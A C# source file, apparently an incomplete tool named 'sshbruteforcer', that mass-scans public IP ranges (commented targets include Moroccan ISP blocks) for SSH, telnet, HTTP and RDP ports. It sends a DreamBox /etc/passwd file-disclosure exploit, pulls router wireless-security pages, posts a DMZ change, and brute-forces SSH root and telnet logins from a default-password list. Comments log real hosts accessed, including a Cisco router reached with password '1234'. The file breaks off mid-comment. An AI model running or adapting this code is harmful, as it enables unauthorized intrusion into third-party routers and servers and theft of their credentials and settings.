using System;
using System.Collections; //ArrayList
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Net.Sockets;
using System.Net;
using Tamir.SharpSsh;
//TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
//JA
namespace sshbruteforcer
{
public static class IPAddressMask
{
private static void CheckIPVersion(IPAddress ipAddress, IPAddress mask, out byte[] addressBytes, out byte[] maskBytes)
{
if (mask == null)
{
throw new ArgumentException();
}
addressBytes = ipAddress.GetAddressBytes();
maskBytes = mask.GetAddressBytes();
if (addressBytes.Length != maskBytes.Length)
{
throw new ArgumentException("The address and mask don't use the same IP standard");
}
}
public static IPAddress And(this IPAddress ipAddress, IPAddress mask)
{
byte[] addressBytes;
byte[] maskBytes;
CheckIPVersion(ipAddress, mask, out addressBytes, out maskBytes);
byte[] resultBytes = new byte[addressBytes.Length];
for (int i = 0; i < addressBytes.Length; ++i)
{
resultBytes[i] = (byte)(addressBytes[i] & maskBytes[i]);
}
return new IPAddress(resultBytes);
}
private static IPAddress empty = IPAddress.Parse("0.0.0.0");
private static IPAddress intranetMask1 = IPAddress.Parse("10.255.255.255");
private static IPAddress intranetMask2 = IPAddress.Parse("172.16.0.0");
private static IPAddress intranetMask3 = IPAddress.Parse("172.31.255.255");
private static IPAddress intranetMask4 = IPAddress.Parse("192.168.255.255");
/// <summary>
/// Retuns true if the ip address is one of the following
/// IANA-reserved private IPv4 network ranges (from http://en.wikipedia.org/wiki/IP_address)
/// Start End
/// 10.0.0.0 10.255.255.255
/// 172.16.0.0 172.31.255.255
/// 192.168.0.0 192.168.255.255
/// </summary>
/// <returns></returns>
public static bool IsOnIntranet(this IPAddress ipAddress)
{
if (empty.Equals(ipAddress))
{
return false;
}
bool onIntranet = IPAddress.IsLoopback(ipAddress);
onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask1)); //10.255.255.255
onIntranet = onIntranet || ipAddress.Equals(ipAddress.And(intranetMask4)); ////192.168.255.255
onIntranet = onIntranet || (intranetMask2.Equals(ipAddress.And(intranetMask2))
&& ipAddress.Equals(ipAddress.And(intranetMask3)));
return onIntranet;
}
}
public class Program //(string ipaddress)
{
// public Socket Sock_scan;
static Byte[] m_byBuff = new Byte[32767];
int Max_thread=50;
private static AsyncCallback callbackProc ;
private static ArrayList m_ListOptions = new ArrayList();
static Char IAC = Convert.ToChar(255);
static Char DO = Convert.ToChar(253);
static Char DONT = Convert.ToChar(254);
static Char WILL = Convert.ToChar(251);
static Char WONT = Convert.ToChar(252);
static Char SB = Convert.ToChar(250);
static Char SE = Convert.ToChar(240);
// ManualResetEvent instances signal completion.
private static ManualResetEvent connectDone =
new ManualResetEvent(false);
private static ManualResetEvent sendDone =
new ManualResetEvent(false);
private static ManualResetEvent receiveDone =
new ManualResetEvent(false);
// The response from the remote device.
private static String response = String.Empty;
public static Compteur_thread cpt_th = new Compteur_thread();
string ipaddress;
int portx;
//public static IPAddress address = IPAddress.Parse("10.20.10.5");
//bool onTheIntranet = address.IsOnIntranet();
public Program(string ipaddress, int portx)
{
this.ipaddress = ipaddress;
this.portx = portx;
//this.cpt_th = new Compteur_thread();
}
public static void Main(string[] args)
{
Program p1 = new Program("go",5);
//p1.go();
Thread th_Scan_ip_port = new Thread(new ThreadStart(p1.go));
th_Scan_ip_port.Start();
}
public void go()
{
// CScanner_IP s;
// s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
byte[] t_IP_start;
byte[] t_IP_end;
// IPAddress MyExternalIp = GetExternalIp();
// Console.WriteLine("MyExternalIp=" + MyExternalIp);
// string[] s_ip = MyExternalIp.ToString().Split('.');
// string[] s2_ip = MyExternalIp.ToString().Split('.');
string adresse_en_cours;
int Port_start=22;
int Port_end=23;
Thread th_Lance_Scan;
Thread th_Scan_ip_port;
cpt_th.lancer_thread += new Program.Compteur_thread.Lancer_Thread(Lancer_Thread);
//Decoupe IP debut
//196.28.249.--- Burkina Faso
//41.202.193.--- Cameroun
//195.24.206.--- Cameroun
//90.4.125.--- France
//202.152.43.--- Indonésie
//202.159.126.--- Indonésie
//http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
//41.214
string[] s_ip = { "41", "141", "1", "1" }; //zawi 41.250.195.107
//string[] s_ip={"41", "250", "75", "1"}; //zawi 41.250.195.107
//string[] s_ip = { "81", "192", "102", "1" }; //Maroc telecom ip fixe 81.192.102.8: netpeas 81.192.152.205: cnia
//41.248.0
//41.248.158.92
//string[] s_ip = { "41", "141", "235", "1" }; //example: 41.141.235.82
//41.141.55.16 Agadir
//41.143.11.192
//41.250.59.57
//41.250.118.53
//41.250.129.142
//string[] s_ip = { "41", "250", "82", "159" }; //example: 41.250.82.159
// string[] s_ip = { "196", "12", "232", "1" }; //196.12.232.120 <snip> location
//196.206.198.10 Rabat
//string[] s_ip = { "41", "250", "136", "1" }; //<snip> location 41.250.136.238
//string[] s_ip = { "41", "250", "150", "18" };
//string[] s_ip = { "41", "250", "195", "1"}; //zawi 41.250.195.107
//string[] s_ip = { "41", "251", "16", "1" }; //<snip> location 41.251.16.238
//string[] s_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
//http://www.robtex.com/dns/adsl.iam.net.ma.html#records
//string[] s_ip = { "196", "217", "240", "1" }; //MENARA (mail)
//string[] s_ip = { "81", "192", "48", "1" }; //MENARA (dns)
//string[] s_ip = { "212", "217", "0", "1" }; //MENARA
t_IP_start = new byte[4];
// for (int i = 0; i < s_ip.Length; i++)
// t_IP_start[i] = Convert.ToByte(s_ip[i]);
t_IP_start[0] = Convert.ToByte(s_ip[0]);
t_IP_start[1] = Convert.ToByte(s_ip[1]);
t_IP_start[2] = Convert.ToByte(s_ip[2]);
t_IP_start[3] = Convert.ToByte(s_ip[3]);
//t_IP_start[3] = Convert.ToByte("1");
//string[] s2_ip={"41", "250", "149", "254"}; //zawi
// string[] s2_ip={"41", "251", "254", "254"}; //zawi
string[] s2_ip = { "196", "12", "233", "255" }; //196.12.232.120 <snip> location
//string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location 41.251.35.72
//string[] s2_ip = { "41", "141", "235", "254" }; //<snip> location 41.141.235.82
//string[] s2_ip = { "91", "121", "78", "55" }; //OVH 91.121.78.55
// string[] s2_ip = { "41", "250", "150", "19" };
//string[] s2_ip = { "196", "217", "255", "255" }; //MENARA (mail)
//string[] s2_ip = { "81", "192", "63", "255" }; //MENARA (dns)
//string[] s2_ip = { "212", "217", "31", "255" }; //MENARA
t_IP_end = new byte[4];
// for (int i = 0; i < s_ip.Length; i++)
// t_IP_end[i] = Convert.ToByte(s2_ip[i]);
t_IP_end[0] = Convert.ToByte(s2_ip[0]);
t_IP_end[1] = Convert.ToByte(s2_ip[1]);
t_IP_end[2] = Convert.ToByte(s2_ip[2]);
t_IP_end[3] = Convert.ToByte(s2_ip[3]);
//t_IP_end[3] = Convert.ToByte("255");
// private void Lancer_Scan()
// {
int i=0, j=0, k=0, l=0;
int max_j=0, max_k=0, max_l=0;
bool start_j = true;
bool start_k = true;
bool start_l = true;
try
{
// Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
//Console.WriteLine("Debut du scan");
// if(init_scan != null)init_scan(this, infs);
for(i = t_IP_start[0];i <= t_IP_end[0]; i++)
{
if((start_j) && (t_IP_start[0] != t_IP_end[0]))
{
j = t_IP_start[1];
max_j = 255;
}
if((start_j) && (t_IP_start[0] == t_IP_end[0]))
{
j = t_IP_start[1];
max_j = t_IP_end[1];
}
if((!start_j) && (i != t_IP_end[0]))
{
j = 0;
max_j = 255;
}
if((!start_j) && (i == t_IP_end[0]))
{
j = 0;
max_j = t_IP_end[1];
}
for( ;j <= max_j; j++)
{
if((start_k) && (t_IP_start[1] != t_IP_end[1]))
{
k = t_IP_start[2];
max_k = 255;
}
if((start_k) && (t_IP_start[1] == t_IP_end[1]))
{
k = t_IP_start[2];
max_k = t_IP_end[2];
}
if((!start_k) && (j != t_IP_end[1]))
{
k = 0;
max_k = 255;
}
if((!start_k) && (j == t_IP_end[1]))
{
k = 0;
max_k = t_IP_end[2];
}
for( ;k <= max_k; k++)
{
if((start_l) && (t_IP_start[2] != t_IP_end[2]))
{
l = t_IP_start[3];
max_l = 255;
}
if((start_l) && (t_IP_start[2] == t_IP_end[2]))
{
l = t_IP_start[3];
max_l = t_IP_end[3];
}
if((!start_l) && (k != t_IP_end[2]))
{
l = 0;
max_l = 255;
}
if((!start_l) && (k == t_IP_end[2]))
{
l = 0;
max_l = t_IP_end[3];
}
for( ;l <= max_l; l++)
{
adresse_en_cours = i.ToString() + "." + j.ToString() + "." + k.ToString() + "." + l.ToString();
// Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
// Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
// if(debut_scan != null)
// debut_scan(this, info);
/*
Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
*/
int nb_thread = 0;
for (int port = Port_start; port <= Port_end; port++)
{
/*
Scanner_IP_Port(adresse_en_cours, port);
th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
th_Scan_ip_port.Start();
*/
Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, port, cpt_th);
Thread t = new Thread(new ThreadStart(sc.Scanner_IP_Port));
t.Start();
cpt_th.Incrementer();
nb_thread = 0;
cpt_th.Nb_thread(out nb_thread);
if (nb_thread == this.Max_thread)
{
lock (this)
{
// Console.WriteLine("DEBUG WAIT1");
Monitor.Wait(this);
}
}
}
//http scan
Scanner_ip_port sc2 = new Scanner_ip_port(adresse_en_cours, 80, cpt_th);
Thread t2 = new Thread(new ThreadStart(sc2.Scanner_IP_Port));
t2.Start();
cpt_th.Incrementer();
nb_thread = 0;
cpt_th.Nb_thread(out nb_thread);
if (nb_thread == this.Max_thread)
{
lock (this)
{
// Console.WriteLine("DEBUG WAIT2");
Monitor.Wait(this);
}
}
//https scan
Scanner_ip_port sc3 = new Scanner_ip_port(adresse_en_cours, 443, cpt_th);
Thread t3 = new Thread(new ThreadStart(sc3.Scanner_IP_Port));
t3.Start();
cpt_th.Incrementer();
nb_thread = 0;
cpt_th.Nb_thread(out nb_thread);
if (nb_thread == this.Max_thread)
{
lock (this)
{
//Console.WriteLine("DEBUG WAIT2");
Monitor.Wait(this);
}
}
//VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
Scanner_ip_port sc1720 = new Scanner_ip_port(adresse_en_cours, 1720, cpt_th);
Thread t1720 = new Thread(new ThreadStart(sc1720.Scanner_IP_Port));
t1720.Start();
cpt_th.Incrementer();
nb_thread = 0;
cpt_th.Nb_thread(out nb_thread);
if (nb_thread == this.Max_thread)
{
lock (this)
{
//Console.WriteLine("DEBUG WAIT2");
Monitor.Wait(this);
}
}
//RDP scan
Scanner_ip_port sc3389 = new Scanner_ip_port(adresse_en_cours, 3389, cpt_th);
Thread t3389 = new Thread(new ThreadStart(sc3389.Scanner_IP_Port));
t3389.Start();
cpt_th.Incrementer();
nb_thread = 0;
cpt_th.Nb_thread(out nb_thread);
if (nb_thread == this.Max_thread)
{
lock (this)
{
//Console.WriteLine("DEBUG WAIT2");
Monitor.Wait(this);
}
}
/*
sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
th_Scan_ip_port.Start();
cpt_th.Incrementer();
int nb_thread = 0;
cpt_th.Nb_thread(out nb_thread);
*/
/*
if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
{
Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
if(this.maj_prg_bar != null)
this.maj_prg_bar(this, ifs);
this.pas_a_atteindre += this.pas_progress;
}
i_progress++;
*/
/*
if(nb_thread == this.Max_thread)
{
lock(this)
{
Monitor.Wait(this);
}
if(this.ARRETER_SCAN)
{
Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
if(fin_scan != null)fin_scan(this, inf_s);
return;
}
}
*/
}
start_l = false;
}
start_k = false;
}
start_j = false;
}
// Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
// if(fin_scan != null)fin_scan(this, inf);
}
catch(Exception e)
{
Console.WriteLine("BADBOY: "+e.ToString());
}
// }
}
public class Scanner_ip_port
{
string adresse_ip;
int port;
Compteur_thread cpt_th;
public Scanner_ip_port(string adresse_ip, int port, Compteur_thread cpt_th)
{
this.adresse_ip = adresse_ip;
this.port = port;
this.cpt_th = cpt_th;
}
public void Scanner_IP_Port()
{
try
{
// Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());
IPAddress adresseIP = IPAddress.Parse(adresse_ip);
IPEndPoint ip = new IPEndPoint(adresseIP, port);
Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
//Sock_scan.Blocking = false;
// Connect to the remote endpoint.
Sock_scan.Connect(ip);
/*asynchronous
try
{
Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
}
catch (Exception e)
{
Console.WriteLine("DEBUG BEGINCONNECT: "+e);
}
Console.WriteLine("DEBUG RACHEL");
connectDone.WaitOne(1000);
asynchronous*/
// Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
Console.WriteLine("{0} -> Port {1} open", adresse_ip, port);
// if (scan_en_cours != null) scan_en_cours(this, info);
/*
Byte[] RecvBytes = new Byte[256];
String strRetPage = null;
Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
Encoding ASCII = Encoding.ASCII;
strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
while (bytes > 0)
{
bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
}
Console.WriteLine(strRetPage);
*/
byte[] data = new byte[4096];
string banner;
int recv;
/*
NetworkStream ns = new NetworkStream(Sock_scan);
if (ns.CanRead)
{
recv = ns.Read(data, 0, data.Length);
stringData = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("== BANNER START =======================");
Console.WriteLine(stringData);
Console.WriteLine("== BANNER END =======================");
}
else
{
Console.WriteLine("Error: Can't read from this socket");
ns.Close();
// server.Close();
// return;
}
*/
// Receive the response from the remote device.
/*synchro*/
recv = Sock_scan.Receive(data);
banner = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0}:{1} -> BANNER01: " + banner, adresse_ip, port);
if (banner == "")
{
recv = Sock_scan.Receive(data);
banner = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0}:{1} -> BANNER02: " + banner, adresse_ip, port);
}
/*synchro*/
/*asynchro
Receive(Sock_scan);
receiveDone.WaitOne(1000);
// Write the response to the console.
Console.WriteLine("Response received : {0}", response);
banner = response;
asynchro*/
if (port == 21)
{
Sock_scan.Close();
// ftptry(adresse_ip);
}
if (port == 22)
{
Sock_scan.Close();
// sshtry(adresse_ip);
}
if (port == 23)
{
if (banner.Contains("ogin:") || banner.Contains("assword:") || banner.Contains("Connection was denied by remote host according to ACL!"))
{
}
else
{
recv = Sock_scan.Receive(data);
banner = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0}:{1} -> BANNER03: " + banner, adresse_ip, port);
if (banner.Contains("ogin:") || banner.Contains("assword:"))
{
}
else
{
recv = Sock_scan.Receive(data);
banner = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0}:{1} -> BANNER04: " + banner, adresse_ip, port);
}
}
Sock_scan.Close();
if (banner.Contains("Connection was denied by remote host according to ACL!"))
{
}
else
{
telnettry(adresse_ip, banner);
}
}
if (port == 80)
{
string ResponseText = "";
StreamReader SR = null;
HttpWebResponse response = null;
HttpWebRequest request;
request = (HttpWebRequest)HttpWebRequest.Create("http://"+adresse_ip+"/password.cgi");
//ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
request.Method = "GET";
//request.ContentType = "application/xml";
response = (HttpWebResponse)request.GetResponse();
SR = new StreamReader(response.GetResponseStream());
ResponseText = SR.ReadToEnd();
Console.WriteLine(string.Format("password.cgi response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
Console.WriteLine(string.Format("password.cgi response headers : [{0}]", response.Headers.ToString()));
Console.WriteLine(string.Format("password.cgi response received : [{0}]", ResponseText));
//***********************************************************************************************************************************************
//DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
//http://www.exploit-db.com/exploits/18079/
request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/file?file=/etc/passwd");
//ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
request.Method = "GET";
//request.ContentType = "application/xml";
response = (HttpWebResponse)request.GetResponse();
SR = new StreamReader(response.GetResponseStream());
ResponseText = SR.ReadToEnd();
Console.WriteLine(string.Format("DreamBox RFI response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
Console.WriteLine(string.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()));
Console.WriteLine(string.Format("DreamBox RFI response received : [{0}]", ResponseText));
//***********************************************************************************************************************************************
//108M Wireless ADSL2+ Router
//http://41.250.9.119/wlcfg.html //Wireless/Basic
//http://41.250.9.119/wlsecurity.html //Wireless/Security
request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlcfg.html");
//ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
request.Method = "GET";
//request.ContentType = "application/xml";
response = (HttpWebResponse)request.GetResponse();
SR = new StreamReader(response.GetResponseStream());
ResponseText = SR.ReadToEnd();
Console.WriteLine(string.Format("wlcfg.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
Console.WriteLine(string.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()));
Console.WriteLine(string.Format("wlcfg.html response received : [{0}]", ResponseText));
//***********************************************************************************************************************************************
request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlsecurity.html");
//ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
request.Method = "GET";
//request.ContentType = "application/xml";
response = (HttpWebResponse)request.GetResponse();
SR = new StreamReader(response.GetResponseStream());
ResponseText = SR.ReadToEnd();
Console.WriteLine(string.Format("wlsecurity.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
Console.WriteLine(string.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()));
Console.WriteLine(string.Format("wlsecurity.html response received : [{0}]", ResponseText));
//***********************************************************************************************************************************************
//http://41.250.9.119/scdmz.html //DMZ
request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/scdmz.html?address=192.168.1.2"); //dmzAddr
//ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);
request.Method = "POST";
//request.ContentType = "application/xml";
string postData = "address=192.168.1.2";
byte[] byteArray = Encoding.UTF8.GetBytes(postData);
request.ContentLength = byteArray.Length;
Stream dataStream = request.GetRequestStream();
dataStream.Write(byteArray, 0, byteArray.Length);
dataStream.Close();
response = (HttpWebResponse)request.GetResponse();
SR = new StreamReader(response.GetResponseStream());
ResponseText = SR.ReadToEnd();
Console.WriteLine(string.Format("scdmz.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
Console.WriteLine(string.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()));
Console.WriteLine(string.Format("scdmz.html response received : [{0}]", ResponseText));
}
cpt_th.Decrementer();
//Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
}
catch (Exception e)
{
/*
Info_Scan info = new Info_Scan(adresse_ip, port, "Closed Port", "", ind, Resultat_Scan.echec);
if (scan_en_cours != null) scan_en_cours(this, info);
*/
cpt_th.Decrementer();
// Console.WriteLine("DEBUG {0} -> Port {1} closed", adresse_ip, port);
// Console.WriteLine("EXCEPT: " + e);
}
}
}
static List<string> passwords = new List<string>
{
"admin",
"1234",
"cisco",
"",
"Admin",
"root",
"toor",
"default",
"azerty",
"qwerty",
"12345",
"123456",
"1234567",
"12345678",
"dreambox",
"test",
"user",
"demo",
"ZXDSL",
"password",
"agadir",
"menara",
"Menara",
"maroc",
"vodafone",
"epicrouter", //conexant telnet
//http://www.itscolumn.com/2011/11/25-password-that-you-should-not-use-not-for-any-accounts/
"abc123",
"monkey",
"letmein",
"trustno1",
"dragon",
"baseball",
"111111",
"iloveyou",
"master",
"sunshine",
"ashley",
"bailey",
"passw0rd",
"shadow",
"123123",
"654321",
"superman",
"qazwsx",
"michael",
"football"
//123123
};
public static void sshtry(string myip)
{
Console.WriteLine("sshtry");
// sshtry("test");
foreach (string password in passwords)
{
try
{
Console.Write("-Connecting...");
SshStream ssh = new SshStream(myip, "root", password);
Console.WriteLine("{0} -> SSH PASSWORD IS: {1}\n", myip, password);
Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac);
Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion);
Console.WriteLine("-Use the 'exit' command to disconnect.");
Console.WriteLine();
//Sets the end of response character
ssh.Prompt = "#";
//Remove terminal emulation characters
ssh.RemoveTerminalEmulationCharacters = true;
//Reads the initial response from the SSH stream
// Console.Write(ssh.ReadResponse());
////Send commands from the user
//while (true)
//{
// string command = Console.ReadLine();
// if (command.ToLower().Equals("exit"))
// break;
// //Write command to the SSH stream
// ssh.Write(command);
// //Read response from the SSH stream
// Console.Write(ssh.ReadResponse());
//}
ssh.Close(); //Close the connection
Console.WriteLine("Connection closed.");
}
catch (Exception e)
{
string response = string.Empty;
response = e.Message;
if (response == "Auth fail")
{
Console.Write("{0} -> bad ssh password: {1}\n", myip, password);
// sshtry("12345");
}
else
{
Console.WriteLine("{0} SSH ERROR -> "+e.Message,myip);
}
}
}
}
public static void telnettry(string myip, string banner)
{
Console.WriteLine("telnettry");
Socket Sock_scan;
byte[] data = new byte[1024];
string stringdata="";
int recv;
//try
//{
IPAddress adresseIP = IPAddress.Parse(myip);
IPEndPoint ip = new IPEndPoint(adresseIP, 23);
// Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
//Sock_scan.Blocking = false; // This is a non blocking IO
/*
// Assign Callback function to read from Asyncronous Socket
callbackProc = new AsyncCallback(ConnectCallback);
// Begin Asyncronous Connection
Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
*/
// Sock_scan.Connect(ip);
//recv = Sock_scan.Receive(data);
//Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
//}
//catch (Exception eeeee)
//{
// Console.WriteLine(eeeee.Message);
//}
String strRetPage = null;
Int32 bytes;
Byte[] RecvBytes = new Byte[256];
Encoding ASCII = Encoding.ASCII;
/*
bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
while (bytes > 0)
{
bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
}
Console.WriteLine("Banner telnet: " + strRetPage);
*/
if (banner.Contains("ogin:") || banner.Contains("sername:"))
{
Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
Sock_scan.Connect(ip);
recv = Sock_scan.Receive(data);
stringdata = Encoding.ASCII.GetString(data, 0, recv);
Console.WriteLine("{0} -> BANNERLOGIN: " + stringdata, myip);
#region BANNERS01
//Exemple: Vulcan
//<BAD SEQUENCE>
//Copyright (c) 2001-2003 by Conexant, Inc.
//login: 01
//password:
//Echec Login
//login:
//login: 02
//password:
//Echec Login
//login: 03
//password:
//Echec Login
//login:
//login: 04
//password:
//Echec Login
//login: 05
//password:
//Echec Login
//Perte de la connexion à l'hôte.
//</BAD SEQUENCE>
//************************************************************************************
// CONEXANT SYSTEMS, INC.
// ACCESS RUNNER ADSL CONSOLE PORT 3.21
//LOGON PASSWORD>
//(epicrouter)
//
//
// CONEXANT SYSTEMS, INC.
// ACCESS RUNNER ADSL CONSOLE PORT 3.21
// MAIN MENU
// 0. Select VC Adaptor
// 1. Display Firmware Version
// 2. Password Setup
// 3. Connection Status
// 4. Network Setup
// 5. ADSL Setup
// 6. System Maintenance
// S. Save Settings and Reset Unit
// R. Reset Without Saving Changes
// Q. Quit Session
// Enter your selection below:
//>>>
//(2)
// CONEXANT SYSTEMS, INC.
// ACCESS RUNNER ADSL CONSOLE PORT 3.21
// Password Setup
// 1. Change Administrative Password
// 2. Change PPP User Name and Password
// 3. Change User Password
// Press 'B' to go Back
// Press 'M' to go to Main Menu
// Enter your selection below
//>>>
//(1)
// CONEXANT SYSTEMS, INC.
// ACCESS RUNNER ADSL CONSOLE PORT 3.21
// Change Administrative Password
// Enter New Admin Password:
// (no less than 8 characters, '&' is not accepted)
// (Press ESC to quit)
//>>>
//
// CONEXANT SYSTEMS, INC.
// ACCESS RUNNER ADSL CONSOLE PORT 3.21
// Confirm Administrative Password
// Re-enter New Admin Password:
// (no less than 8 characters, '&' is not accepted)
// (Press ESC to quit)
//>>>
// CONEXANT SYSTEMS, INC.
// ACCESS RUNNER ADSL CONSOLE PORT 3.21
// Password Setup
// 1. Change Administrative Password
// 2. Change PPP User Name and Password
// 3. Change User Password
// Press 'B' to go Back
// Press 'M' to go to Main Menu
// Enter your selection below
//>>>
// CONEXANT SYSTEMS, INC.
// ACCESS RUNNER ADSL CONSOLE PORT 3.21
// Quit Session
// This will quit current telnet session.
// Press 'Y' to continue, or 'B' to go back.
// Press 'M' for main menu.
//>>>
//************************************************************************************
//NetDVRDVS:admin
//Password:
//Login incorrect
//************************************************************************************
//User Access Verification
//Username: admin
//Password:
//% Login invalid
//************************************************************************************
//(212.217.28.244)
//User Access Verification
//Password: 1234
//GPBM>help
//Help may be requested at any point in a command by entering
//a question mark '?'. If nothing matches, the help list will
//be empty and you must backup until entering a '?' shows the
//available options.
//Two styles of help are provided:
//1. Full help is available when you are ready to enter a
// command argument (e.g. 'show ?') and describes each possible
// argument.
//2. Partial help is provided when an abbreviated argument is entered
// and you want to know what arguments match the input
// (e.g. 'show pr?'.)
//GPBM>
//GPBM>?
//Exec commands:
// <1-99> Session number to resume
// access-enable Create a temporary Access-List entry
// access-profile Apply user-profile to interface
// clear Reset functions
// connect Open a terminal connection
// disable Turn off privileged commands
// disconnect Disconnect an existing network connection
// enable Turn on privileged commands
// exit Exit from the EXEC
// help Description of the interactive help system
// lock Lock the terminal
// login Log in as a particular user
// logout Exit from the EXEC
// name-connection Name an existing network connection
// pad Open a X.29 PAD connection
// ping Send echo messages
// ppp Start IETF Point-to-Point Protocol (PPP)
// resume Resume an active network connection
// rlogin Open an rlogin connection
// set Set system parameter (not config)
// show Show running system information
// slip Start Serial-line IP (SLIP)
// systat Display information about terminal lines
// telnet Open a telnet connection
// terminal Set terminal line parameters
// traceroute Trace route to destination
// tunnel Open a tunnel connection
// where List active connections
// x28 Become an X.28 PAD
// x3 Set X.3 parameters on PAD
//GPBM>
//GPBM>ping 8.8.8.8
//Type escape sequence to abort.
//Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
//!!!!!
//Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
//GPBM>
//GPBM>show ?
//backup Backup status
//c1700 Show c1700 information
//cca CCA information
//cdapi CDAPI information
//class-map Show QoS Class Map
//clock Display the system clock
//compress Show compression statistics
//dialer Dialer parameters and statistics
//exception exception informations
//flash: display information about flash: file system
//history Display the session command history
//hosts IP domain-name, lookup style, nameservers, and host table
//isdn ISDN information
//location Display the system location
//modemcap Show Modem Capabilities database
//policy-map Show QoS Policy Map
//ppp PPP parameters and statistics
//queue Show queue contents
//queueing Show queueing configuration
//radius Shows radius information
//rmon rmon statistics
//rtr Response Time Reporter (RTR)
//sessions Information about Telnet connections
//snmp snmp statistics
//tacacs Shows tacacs+ server statistics
//template Template information
//terminal Display terminal configuration parameters
//traffic-shape traffic rate shaping configuration
//users Display information about terminal lines
//version System hardware and software status
//GPBM>show version
//Cisco Internetwork Operating System Software
//IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
//Copyright (c) 1986-2000 by cisco Systems, Inc.
//Compiled Tue 14-Mar-00 16:40 by cmong
//Image text-base: 0x80008088, data-base: 0x805B7EE0
//ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)
//GPBM uptime is 5 weeks, 6 days, 45 minutes
//System returned to ROM by power-on
//System image file is "flash:c1700-y-mz.121-1"
//cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
//.
//Processor board ID JAD04180989 (362865562), with hardware revision 0000
//M860 processor: part number 0, mask 32
//Bridging software.
//X.25 software, Version 3.0.0.
//Basic Rate ISDN software, Version 1.1.
//1 FastEthernet/IEEE 802.3 interface(s)
//1 Serial(sync/async) network interface(s)
//1 ISDN Basic Rate interface(s)
